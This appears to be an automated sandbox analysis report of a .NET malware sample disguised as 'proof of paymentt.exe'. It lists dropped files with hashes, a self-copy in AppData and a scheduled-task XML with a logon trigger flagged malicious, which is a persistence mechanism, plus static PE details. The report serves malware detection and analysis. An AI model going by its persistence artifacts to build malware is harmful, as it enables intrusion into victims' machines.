SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bhv934F.tmp

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	15728640
Entropy (8bit):	0.10106922760070924
Encrypted:	false
SSDEEP:	1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
MD5:	8474A17101F6B908E85D4EF5495DEF3C
SHA1:	7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
SHA-256:	56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
SHA-512:	056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
Malicious:	false
Preview:	..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chp960F.tmp

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chp964E.tmp

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp73D0.tmp

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.110252129053435
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtvxvn:cgergYrFdOFzOzN33ODOiDdKrsuTpv
MD5:	30DE788036594047F6866E18172FCF0E
SHA1:	5ECD2B74984875A687ADE21A0F028B00AC3DB1E4
SHA-256:	D94D3B3CC1E6476E6322553FB6F8F7D643B15E1820E47858CE87B7DA1A28B036
SHA-512:	84F55B362D05C1E1E963B4DF566FF4763AA4382E0F0FCBBEE8034DDA1EB39BB9DAC07252548156F9BE116BF98A075B3AC06C114625499CEB499DB5CC92B89A45
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.110252129053435
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtvxvn:cgergYrFdOFzOzN33ODOiDdKrsuTpv
MD5:	30DE788036594047F6866E18172FCF0E
SHA1:	5ECD2B74984875A687ADE21A0F028B00AC3DB1E4
SHA-256:	D94D3B3CC1E6476E6322553FB6F8F7D643B15E1820E47858CE87B7DA1A28B036
SHA-512:	84F55B362D05C1E1E963B4DF566FF4763AA4382E0F0FCBBEE8034DDA1EB39BB9DAC07252548156F9BE116BF98A075B3AC06C114625499CEB499DB5CC92B89A45
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 3 08:21:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.98346562783628
Encrypted:	false
SSDEEP:	48:8KdGTiCpH+idAKZdA19ehwiZUklqehN5y+3:8zDW05y
MD5:	FAAC070CF4451BD2954154A43DE6FB62
SHA1:	87E5731AF26CEBC7C9B450A55F7DBDDAE92CD929
SHA-256:	C8BE435E33565DC1124279909A45C3748F7A0A0B760CCBDB9329D54D2319505E
SHA-512:	7F23A2694B2750EBDF5F832FE59BE68E002DA6568A6020D51716E223CD3C103C8C978311EA028899B214F7C09E6DD2DC0282D174B4DE8D16AB5B0AD305A5309D
Malicious:	false
Preview:	L..................F.@.. ...$+.,....z..<;...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.J....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.J....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.J....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.J..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.J...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........kw.C.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 3 08:21:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9946589403001798
Encrypted:	false
SSDEEP:	48:8rdGTiCpH+idAKZdA1weh/iZUkAQkqehk5y+2:8AD09Q35y
MD5:	F4FFF4381D47A8B19213B4726886D01A
SHA1:	C76498012BCE3DD4E225B293F351C4039189A800
SHA-256:	0C32F3DCB637D92AFC4A5C287E62E1342D96570CB64C9564BA5594A70FB0BAAD
SHA-512:	373EE86F44E51226801AC1B00BFDB2487D49551F82358557CD744660DC69B65626C36AB4DDDCD4FB566D646371951A167817C6BEB3675E8600CF191C363E157C
Malicious:	false
Preview:	L..................F.@.. ...$+.,....Hs.<;...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.J....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.J....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.J....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.J..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.J...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........kw.C.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0073619569547745
Encrypted:	false
SSDEEP:	48:8x7dGTiCsH+idAKZdA14tseh7sFiZUkmgqeh7sW5y+BX:8xwD3n45y
MD5:	91A9F315E89BB57027061401DBD7C630
SHA1:	1CB2B5A5FEF4CDA68D7B4327ACEF50F713767B60
SHA-256:	80EDDC2DEAAE67E0C4E0372D16DB5EE46308890F6AD982EFBA08346234F2D1D6
SHA-512:	05B2F15A2E24145691892C9C4D50D7066E4683B5036C3F800D4861887D45B86689DEE541B2C0054C21F16CCF33265E68C9F7B22F7EDFB6E4B12D61AB5050AF63
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.J....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.J....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.J....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.J..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........kw.C.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 3 08:21:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.992574352127052
Encrypted:	false
SSDEEP:	48:8LdGTiCpH+idAKZdA1vehDiZUkwqehA5y+R:8gDfe5y
MD5:	3457E9D9C242B50306F306482E87ACC8
SHA1:	E8C627B3EC0D8C6F7B8DFA2FA90C85B20BBB2D01
SHA-256:	8EB5D5088D4D0BAB1A378602021DF703DA9A3AF433F88B4A69BFF0766DC4C725
SHA-512:	F4F6CF5FACD80D40E5D01E83269F2ECED600831CE47F9617969129E78559EB0730E9BFAB4DFC4EEA0738AC910D046D86E2756523332C98CB1E4598BF31A42625
Malicious:	false
Preview:	L..................F.@.. ...$+.,....Kj.;;...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.J....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.J....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.J....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.J..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.J...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........kw.C.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 3 08:21:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.985306917014091
Encrypted:	false
SSDEEP:	48:87dGTiCpH+idAKZdA1hehBiZUk1W1qeh65y+C:8wDf9a5y
MD5:	A2C9D67BA376663E691598A3F4902CDB
SHA1:	713A8E3B6299FBE2A50F8E1AE9E18B9BF0DE720E
SHA-256:	871FC1E4C669CE970FAB4ABEE06F72D6A0932DA2D635A17FE4690C5C04DF076B
SHA-512:	A7166EB0DA990DC1C73E89EDFF647DA965B9A54E3DCDEF874F23462BB7C9FE572778AB0722DE769F948B98046D500F60D7E349B42F915A68FF8D731D5B8896EC
Malicious:	false
Preview:	L..................F.@.. ...$+.,.......<;...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.J....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.J....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.J....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.J..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.J...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........kw.C.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 3 08:21:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.994848969951323
Encrypted:	false
SSDEEP:	48:8udGTiCpH+idAKZdA1duT+ehOuTbbiZUk5OjqehOuTb45y+yT+:8XDXT/TbxWOvTb45y7T
MD5:	6374B21153262A592B84AB2EA67E84CD
SHA1:	3AC364DB7968FB4F05D9683E5E8A79AC23F01F3E
SHA-256:	97D5F86542E37522AFC067C7428AAA32FA9EF83A115C122FAECCCF2A3288C25A
SHA-512:	8206036098D9E2F315A6ABA9308F7BF6D5D3DBD034D2D4387990D7A01713403F68E857970C4BF3F904407A550A206B5816189F6521F5590ED87DDAEE38961833
Malicious:	false
Preview:	L..................F.@.. ...$+.,....0..;;...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.J....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.J....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.J....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.J..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.J...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........kw.C.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	976896
Entropy (8bit):	7.967327604609445
Encrypted:	false
SSDEEP:	24576:twmCJ4qDVpHWXj1qmmpTjabFQx4jKkihiLvEbWnhX0R1EPyOFXqva:U+qbWXhqmsIy4xihGvEbmRaOs
MD5:	1EDF4AB8BD9F71ADA01B5CD4763C555D
SHA1:	33000BDFC8DDF75BF48F788645ECC6C028A23278
SHA-256:	1FBAC26D1DB7FCE1F1DDC5C552AB50AC44888D906E355F2A9187544A52CB8C94
SHA-512:	1387ACFA96390165B514CFC4A32F09EE7DB6F6FB197264E0BE5695FA28ABB6DDCB1B4191F6B886058F632A92F9E8E2D817AFF447B03842CE74F64F2144DE9117
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x4f....................."........... ........@.. .......................@............@.................................P...K........ ................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc.... ....... ..................@..@.reloc....... ......................@..B........................H..........`C......0....................................................0..A....... .........%.K...(.....L... z........%.A...(.....B...(>........&.....r...p}......}.....(......+..(......(......0.............E....<.........................{.....o......{.....o......+...{.....o......{.....o......+...{.....o.....~B... s...~B... s....~B..../.X ...._..0..........~L..........E................*.........(......{.....o.....r...p...... ....Y..+..{....s.....+.+......E....,...^...+..

C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (714)
Category:	downloaded
Size (bytes):	719
Entropy (8bit):	5.107215389196107
Encrypted:	false
SSDEEP:	12:ukHK8kjm3JBBHslriFTAYsSw7sZAnIIIIIII5wuC/wuGeHHHHHYZw4/ffffffo:FVUm3JBBHslgT9lCuABuH7eHHHHHYqm4
MD5:	D6D9B272436965C0095831E9B6DAFC1A
SHA1:	0A5D9E5142A6AA727911CAA8D6036535FDC0C793
SHA-256:	130BE6080CCCD2FF7568390AFBCD52AE8BEB25B580F7C11A42DA7F8CB09C50DB
SHA-512:	0E12B495EC12B1109772CC983FA862FE90B39A9A95350A909653CE13E778FF3A75545798434291866DC0978F4884E6766BBFF3157FE346EAAFD030C94BF3252A
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["concert week $25 tickets","apple iphone","bj west denver broncos","quordle hints today","tornadoes","randy travis new song","gta 6 release date","borealis trains"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1250,806,805,804,803,802,801,800],"google:suggestsubtypes":[[3,143,362],[3,143,362,10],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.967327604609445
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	proof of paymentt.exe
File size:	976'896 bytes
MD5:	1edf4ab8bd9f71ada01b5cd4763c555d
SHA1:	33000bdfc8ddf75bf48f788645ecc6c028a23278
SHA256:	1fbac26d1db7fce1f1ddc5c552ab50ac44888d906e355f2a9187544a52cb8c94
SHA512:	1387acfa96390165b514cfc4a32f09ee7db6f6fb197264e0be5695fa28abb6ddcb1b4191f6b886058f632a92f9e8e2d817aff447b03842ce74f64f2144de9117
SSDEEP:	24576:twmCJ4qDVpHWXj1qmmpTjabFQx4jKkihiLvEbWnhX0R1EPyOFXqva:U+qbWXhqmsIy4xihGvEbmRaOs
TLSH:	EB25230BF56AFF64E92413B445A5888D53B8D4119231F7635EC624C33F53BA826DEB23
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x4f....................."........... ........@.. .......................@............@................................

File Icon


Icon Hash:	7468496969c9c826

Static PE Info

General

Entrypoint:	0x4ee29e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x663478DD [Fri May 3 05:40:45 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
